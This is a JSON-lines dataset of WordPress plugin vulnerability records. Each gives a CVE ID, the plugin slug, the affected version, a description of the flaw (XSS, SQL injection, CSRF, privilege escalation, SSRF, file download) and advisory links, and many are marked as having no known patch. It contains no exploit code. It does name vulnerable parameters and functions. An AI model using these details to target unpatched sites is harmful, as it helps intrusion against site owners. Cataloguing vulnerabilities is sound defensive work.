{"CVE_ID":"CVE-2024-13456","slug":"n-media-wp-simple-quiz","versionImpact":"2.0","description":"The Easy Quiz Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wqt-question' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/n-media-wp-simple-quiz\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/n-media-wp-simple-quiz\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/788c94a7-a8d6-4ae3-b4ca-f5c60e536f57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/788c94a7-a8d6-4ae3-b4ca-f5c60e536f57?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13631","slug":"om-stripe","versionImpact":"02.00.00","description":"The Om Stripe WordPress plugin through 02.00.00 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c991fdd0-cb9d-43ea-bafa-df3b2e806013\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c991fdd0-cb9d-43ea-bafa-df3b2e806013\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3918","slug":"job-listings","description":"The Job Listings plugin for WordPress is vulnerable to Privilege Escalation due to improper authorization within the register_action() function in versions 0.1 to 0.1.1. The plugin\u2019s registration handler reads the client-supplied $_POST['user_role'] and passes it directly to wp_insert_user() without restricting to a safe set of roles.  This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/job-listings\\\/trunk\\\/includes\\\/forms\\\/class-jlt-form-member.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/job-listings\\\/trunk\\\/includes\\\/forms\\\/class-jlt-form-member.php#L68\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/job-listings\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/job-listings\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9cd43f5-c3d0-4eb2-9c18-1af2edca37ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9cd43f5-c3d0-4eb2-9c18-1af2edca37ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6012","slug":"auto-attachments","versionImpact":"1.8.5","description":"The Auto Attachments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/auto-attachments\\\/trunk\\\/auto-attachments.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/auto-attachments\\\/trunk\\\/auto-attachments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/978c13e5-d30c-4caa-ab6d-256f2517fd79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/978c13e5-d30c-4caa-ab6d-256f2517fd79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0069","slug":"wpaudio-mp3-player","versionImpact":"4.0.2","description":"The WPaudio MP3 Player WordPress plugin through 4.0.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9f00bcb-3746-4a9d-a222-4d532e84615f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9f00bcb-3746-4a9d-a222-4d532e84615f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5108","slug":"easy-newsletter-signups","versionImpact":"1.0.4","description":"The Easy Newsletter Signups WordPress plugin through 1.0.4 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b277929-e88b-4ab6-9190-526e75f5ce7a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b277929-e88b-4ab6-9190-526e75f5ce7a\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6321","slug":"scrollto-bottom","versionImpact":"1.1.1","description":"The ScrollTo Bottom plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 1.1.1. This is due to missing nonce validation and missing file type validation in the 'options_page' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d560f28f-899c-44cf-8640-55647c1de7dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d560f28f-899c-44cf-8640-55647c1de7dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scrollto-bottom\\\/trunk\\\/scrollto-bottom.php?rev=516875#L256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scrollto-bottom\\\/trunk\\\/scrollto-bottom.php?rev=516875#L256\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5975","slug":"cz-loan-management","versionImpact":"1.1","description":"The CZ Loan Management WordPress plugin through 1.1 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/68f81943-b007-49c8-be9c-d0405b2ba4cf\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/68f81943-b007-49c8-be9c-d0405b2ba4cf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9178","slug":"woo-floating-cart-lite","versionImpact":"2.8.2","description":"The XT Floating Cart for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/921be7ff-3d38-4b69-8a1f-a64d5aabd2dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/921be7ff-3d38-4b69-8a1f-a64d5aabd2dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-floating-cart-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-floating-cart-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-floating-cart-lite\\\/trunk\\\/xt-framework\\\/includes\\\/customizer\\\/class-customizer.php#L1012\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-floating-cart-lite\\\/trunk\\\/xt-framework\\\/includes\\\/customizer\\\/class-customizer.php#L1012\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181762\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181762\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11501","slug":"multi-gallery","versionImpact":"1.3","description":"The Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3 via deserialization of untrusted input from wd_gallery_$id parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-gallery\\\/tags\\\/1.3\\\/partials\\\/Shortcode.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-gallery\\\/tags\\\/1.3\\\/partials\\\/Shortcode.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/778f7d9b-6376-4026-a291-1fedeabe8c99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/778f7d9b-6376-4026-a291-1fedeabe8c99?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13437","slug":"book-a-room","versionImpact":"2.9","description":"The Book a Room plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9. This is due to missing or incorrect nonce validation on the 'bookaroom_Settings' page. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/book-a-room\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/book-a-room\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfef57b6-26b1-433b-9037-46f908422f72?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfef57b6-26b1-433b-9037-46f908422f72?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13630","slug":"news-list","versionImpact":"1.0","description":"The NewsTicker WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15eed487-01ac-4c1e-88f8-26cfa036fb54\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15eed487-01ac-4c1e-88f8-26cfa036fb54\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3779","slug":"personizely","versionImpact":"0.10","description":"The Personizely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018widgetId\u2019 parameter in all versions up to, and including, 0.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/personizely\\\/tags\\\/0.10\\\/class.personizely.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/personizely\\\/tags\\\/0.10\\\/class.personizely.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/personizely\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/personizely\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f07d22ef-5afd-48a4-9e67-31a3ab3efdd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f07d22ef-5afd-48a4-9e67-31a3ab3efdd6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5923","slug":"game-review-block","versionImpact":"4.8.1","description":"The Game Review Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 4.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/mtoensing\\\/game-review-block\\\/commit\\\/135aa118b75db5242df7fd1ef13cc09ec3410f3a\",\"name\":\"https:\\\/\\\/github.com\\\/mtoensing\\\/game-review-block\\\/commit\\\/135aa118b75db5242df7fd1ef13cc09ec3410f3a\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/game-review-block\\\/tags\\\/4.7.0\\\/src\\\/game-table\\\/callback.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/game-review-block\\\/tags\\\/4.7.0\\\/src\\\/game-table\\\/callback.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/game-review-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/game-review-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88520d8e-8e13-4b58-9df3-3b99afd39144?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88520d8e-8e13-4b58-9df3-3b99afd39144?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47615","slug":"learnpress","versionImpact":"4.1.7.3.2","description":"Local File Inclusion vulnerability in LearnPress \u2013 WordPress LMS Plugin <= 4.1.7.3.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"name\":\"https:\\\/\\\/patchstack.com\\\/articles\\\/multiple-critical-vulnerabilities-fixed-in-learnpress-plugin-version\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/learnpress\\\/wordpress-learnpress-plugin-4-1-7-3-2-local-file-inclusion?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0068","slug":"product-gtin-ean-upc-isbn-for-woocommerce","versionImpact":"1.1.1","description":"The Product GTIN (EAN, UPC, ISBN) for WooCommerce WordPress plugin through 1.1.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4abd1454-380c-4c23-8474-d7da4b2f3b8e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4abd1454-380c-4c23-8474-d7da4b2f3b8e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5802","slug":"wp-knowledgebase","versionImpact":"1.3.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Mihai Iova WordPress Knowledge base & Documentation Plugin \u2013 WP Knowledgebase plugin <=\u00a01.3.4 versions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-knowledgebase\\\/wordpress-wp-knowledgebase-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-knowledgebase\\\/wordpress-wp-knowledgebase-plugin-1-3-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6501","slug":"splashscreen","versionImpact":"0.20","description":"The Splashscreen WordPress plugin through 0.20 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd19189b-de04-44b6-8ac9-0c32399a8976\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd19189b-de04-44b6-8ac9-0c32399a8976\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6501.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6501.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7073","slug":"auto-post-thumbnail","versionImpact":"4.0.0","description":"The Auto Featured Image (Auto Post Thumbnail) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.0 via the upload_to_library AJAX action. This makes it possible for authenticated attackers, with author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc024183-0244-4ef9-9171-057ecd1c3e1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc024183-0244-4ef9-9171-057ecd1c3e1d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-post-thumbnail\\\/tags\\\/3.9.18\\\/includes\\\/class-apt.php#L947\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-post-thumbnail\\\/tags\\\/3.9.18\\\/includes\\\/class-apt.php#L947\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6320","slug":"scrollto-top","versionImpact":"1.2.2","description":"The ScrollTo Top plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 1.2.2. This is due to missing nonce validation and missing file type validation in the 'options_page' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e11f1a56-d5a2-47a4-a5cc-34345966495a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e11f1a56-d5a2-47a4-a5cc-34345966495a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scrollto-top\\\/trunk\\\/scrollto-top.php?rev=662578#L238\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scrollto-top\\\/trunk\\\/scrollto-top.php?rev=662578#L238\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5809","slug":"wp-ajax-contact-form","versionImpact":"2.2.2","description":"The WP Ajax Contact Form WordPress plugin through 2.2.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against admin users","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0af9fbcf-5f0e-4f7f-ae60-b46e704cf0a5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0af9fbcf-5f0e-4f7f-ae60-b46e704cf0a5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7892","slug":"adstxt","versionImpact":"1.0.0","description":"The adstxt Plugin WordPress plugin through 1.0.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c07a4992-c9a1-46a4-9a52-9e38b6d15440\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c07a4992-c9a1-46a4-9a52-9e38b6d15440\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10726","slug":"friendly-functions-for-welcart","versionImpact":"1.2.4","description":"The Friendly Functions for Welcart plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.4. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/friendly-functions-for-welcart\\\/tags\\\/1.2.4\\\/ffw_function_settings.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/friendly-functions-for-welcart\\\/tags\\\/1.2.4\\\/ffw_function_settings.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friendly-functions-for-welcart\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/friendly-functions-for-welcart\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/305f2f13-178d-4b49-b59b-abb35d111299?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/305f2f13-178d-4b49-b59b-abb35d111299?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11464","slug":"easy-code-snippets","versionImpact":"1.0.2","description":"The Easy Code Snippets plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-code-snippets\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-code-snippets\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f5ddbf-2014-40e7-881d-27148bf133ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31f5ddbf-2014-40e7-881d-27148bf133ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13435","slug":"ebook-downloader","versionImpact":"1.0","description":"The Ebook Downloader plugin for WordPress is vulnerable to SQL Injection via the 'download' parameter in all versions up to, and including, 1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-downloader\\\/trunk\\\/ebook_plugin.php#L278\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ebook-downloader\\\/trunk\\\/ebook_plugin.php#L278\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b0c1e5-08f7-44b3-8518-6b0902b84758?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51b0c1e5-08f7-44b3-8518-6b0902b84758?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13629","slug":"pushbiz","versionImpact":"1.0","description":"The pushBIZ  WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ffb548c-14f1-499d-8bbf-6ecc632cbb8c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ffb548c-14f1-499d-8bbf-6ecc632cbb8c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2267","slug":"wp01","versionImpact":"2.6.2","description":"The WP01 plugin for WordPress is vulnerable to Arbitrary File Download in all versions up to, and including, 2.6.2 due to a missing capability check and insufficient restrictions on the make_archive() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to download and read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp01\\\/trunk\\\/inc\\\/class-wp01.php#L109\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp01\\\/trunk\\\/inc\\\/class-wp01.php#L109\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp01\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp01\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/900d09e8-ded5-49b9-81bf-ddfc85d3cf2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/900d09e8-ded5-49b9-81bf-ddfc85d3cf2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32257","slug":"1-click-migration","versionImpact":"2.2","description":"Exposure of Sensitive System Information Due to Uncleared Debug Information vulnerability in 1clickmigration 1 Click WordPress Migration allows Retrieve Embedded Sensitive Data. This issue affects 1 Click WordPress Migration: from n\/a through 2.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/1-click-migration\\\/vulnerability\\\/wordpress-1-click-wordpress-migration-plugin-2-1-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/1-click-migration\\\/vulnerability\\\/wordpress-1-click-wordpress-migration-plugin-2-1-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
